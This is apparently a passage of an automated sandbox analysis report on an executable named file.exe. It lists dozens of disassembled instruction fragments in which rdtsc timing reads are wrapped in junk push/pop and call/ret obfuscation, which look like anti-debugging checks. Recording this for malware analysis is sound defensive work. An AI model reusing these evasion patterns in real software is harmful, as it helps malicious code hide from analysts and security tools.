Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE71B8 second address: FE71C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1015D1C second address: 1015D22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1015D22 second address: 1015D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007FDD5537C436h 0x00000011 popad 0x00000012 push edi 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101643B second address: 101644A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jno 00007FDD5513FC16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101673F second address: 1016771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD5537C447h 0x00000009 popad 0x0000000a pushad 0x0000000b jbe 00007FDD5537C436h 0x00000011 je 00007FDD5537C436h 0x00000017 jc 00007FDD5537C436h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1016A3E second address: 1016A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1016A49 second address: 1016A4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1016A4D second address: 1016A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDD5513FC1Fh 0x0000000d jmp 00007FDD5513FC21h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1016A75 second address: 1016A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101C10F second address: 101C11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnp 00007FDD5513FC18h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101C11E second address: 101C143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FDD5537C436h 0x0000000b jmp 00007FDD5537C446h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101E562 second address: 101E568 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101E682 second address: 101E687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101FB6D second address: 101FB75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101FB75 second address: 101FB7B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101FB7B second address: 101FB8B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDD5513FC22h 0x00000008 jns 00007FDD5513FC16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1023DB7 second address: 1023DCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C442h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102333C second address: 1023342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1023566 second address: 102356E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102356E second address: 102357B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102357B second address: 1023581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1023581 second address: 1023585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1023585 second address: 1023595 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDD5537C436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1023595 second address: 10235A3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDD5513FC18h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10263AB second address: 10263B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10263B1 second address: 10263E1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007FDD5513FC1Fh 0x00000011 pop eax 0x00000012 sbb esi, 5ECF9E38h 0x00000018 call 00007FDD5513FC19h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10263E1 second address: 10263EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10263EB second address: 10263EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10263EF second address: 102641C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FDD5537C447h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007FDD5537C438h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102641C second address: 1026422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1026422 second address: 1026426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102694C second address: 1026956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FDD5513FC16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1026956 second address: 102695A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10269E1 second address: 10269EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10269EB second address: 10269EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10269EF second address: 1026A18 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDD5513FC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jmp 00007FDD5513FC29h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1026F9C second address: 1026FA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102705E second address: 10270AB instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDD5513FC22h 0x00000008 jmp 00007FDD5513FC1Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jbe 00007FDD5513FC21h 0x00000016 xchg eax, ebx 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007FDD5513FC18h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 stc 0x00000032 nop 0x00000033 pushad 0x00000034 push ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1027361 second address: 102736B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDD5537C436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102736B second address: 1027371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1027371 second address: 1027375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1027375 second address: 1027379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1027BB1 second address: 1027BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1027BB5 second address: 1027BBA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102857C second address: 1028582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10295B3 second address: 102963D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FDD5513FC29h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FDD5513FC18h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 jmp 00007FDD5513FC20h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007FDD5513FC18h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 push 00000000h 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FDD5513FC1Eh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1028D94 second address: 1028DA2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102C2CF second address: 102C2E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102FB15 second address: 102FB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD5537C446h 0x00000009 pop ebx 0x0000000a jmp 00007FDD5537C442h 0x0000000f pushad 0x00000010 jmp 00007FDD5537C443h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102FB58 second address: 102FB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1032176 second address: 10321F2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007FDD5537C436h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FDD5537C438h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov bx, di 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007FDD5537C438h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 mov dword ptr [ebp+122D3F7Ah], edx 0x0000004c mov dword ptr [ebp+12481721h], esi 0x00000052 and bx, 28B6h 0x00000057 push 00000000h 0x00000059 cmc 0x0000005a xchg eax, esi 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FDD5537C440h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10332E4 second address: 10332FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FDD5513FC18h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10332FB second address: 1033300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103439F second address: 10343AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10364AA second address: 10364AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103848E second address: 103849A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103849A second address: 103849F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1038B04 second address: 1038B80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D1E0Bh], edi 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FDD5513FC18h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007FDD5513FC18h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 movzx edi, ax 0x00000048 xchg eax, esi 0x00000049 pushad 0x0000004a jng 00007FDD5513FC18h 0x00000050 pushad 0x00000051 popad 0x00000052 jmp 00007FDD5513FC23h 0x00000057 popad 0x00000058 push eax 0x00000059 push eax 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103ABC7 second address: 103AC35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C43Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007FDD5537C443h 0x00000011 or edi, dword ptr [ebp+122D3FA9h] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FDD5537C438h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 push 00000000h 0x00000035 add dword ptr [ebp+122D2EABh], ebx 0x0000003b xchg eax, esi 0x0000003c push ecx 0x0000003d jmp 00007FDD5537C43Eh 0x00000042 pop ecx 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 pushad 0x0000004a popad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102E899 second address: 102E8A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FDD5513FC16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102E8A3 second address: 102E8B2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102E8B2 second address: 102E8B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102E8B6 second address: 102E8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103D9C4 second address: 103D9D3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103D9D3 second address: 103D9D9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103D9D9 second address: 103D9DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103D9DF second address: 103DA48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C448h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FDD5537C438h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D26C1h], edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 mov ebx, dword ptr [ebp+122D270Ch] 0x00000036 jmp 00007FDD5537C442h 0x0000003b push eax 0x0000003c push ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f push esi 0x00000040 pop esi 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103DA48 second address: 103DA4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103EAF3 second address: 103EB3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C445h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e clc 0x0000000f push 00000000h 0x00000011 ja 00007FDD5537C43Ch 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FDD5537C445h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103EB3A second address: 103EB44 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDD5513FC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1032355 second address: 103235A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1041A29 second address: 1041A2F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103347D second address: 10334A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d je 00007FDD5537C436h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10334A5 second address: 10334AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10334AB second address: 10334AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103452A second address: 10345AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push ebx 0x0000000b mov edi, edx 0x0000000d pop edi 0x0000000e push dword ptr fs:[00000000h] 0x00000015 adc bx, 0756h 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push 00000000h 0x00000023 push ebp 0x00000024 call 00007FDD5513FC18h 0x00000029 pop ebp 0x0000002a mov dword ptr [esp+04h], ebp 0x0000002e add dword ptr [esp+04h], 0000001Bh 0x00000036 inc ebp 0x00000037 push ebp 0x00000038 ret 0x00000039 pop ebp 0x0000003a ret 0x0000003b sub ebx, dword ptr [ebp+122D311Ah] 0x00000041 mov eax, dword ptr [ebp+122D1149h] 0x00000047 push 00000000h 0x00000049 push ecx 0x0000004a call 00007FDD5513FC18h 0x0000004f pop ecx 0x00000050 mov dword ptr [esp+04h], ecx 0x00000054 add dword ptr [esp+04h], 00000016h 0x0000005c inc ecx 0x0000005d push ecx 0x0000005e ret 0x0000005f pop ecx 0x00000060 ret 0x00000061 push FFFFFFFFh 0x00000063 mov dword ptr [ebp+122D231Bh], ebx 0x00000069 nop 0x0000006a push eax 0x0000006b push edx 0x0000006c push esi 0x0000006d jnc 00007FDD5513FC16h 0x00000073 pop esi 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10354B5 second address: 10354B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10429D4 second address: 10429D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10429D8 second address: 10429F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C445h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10429F1 second address: 1042A08 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FDD5513FC16h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jbe 00007FDD5513FC20h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
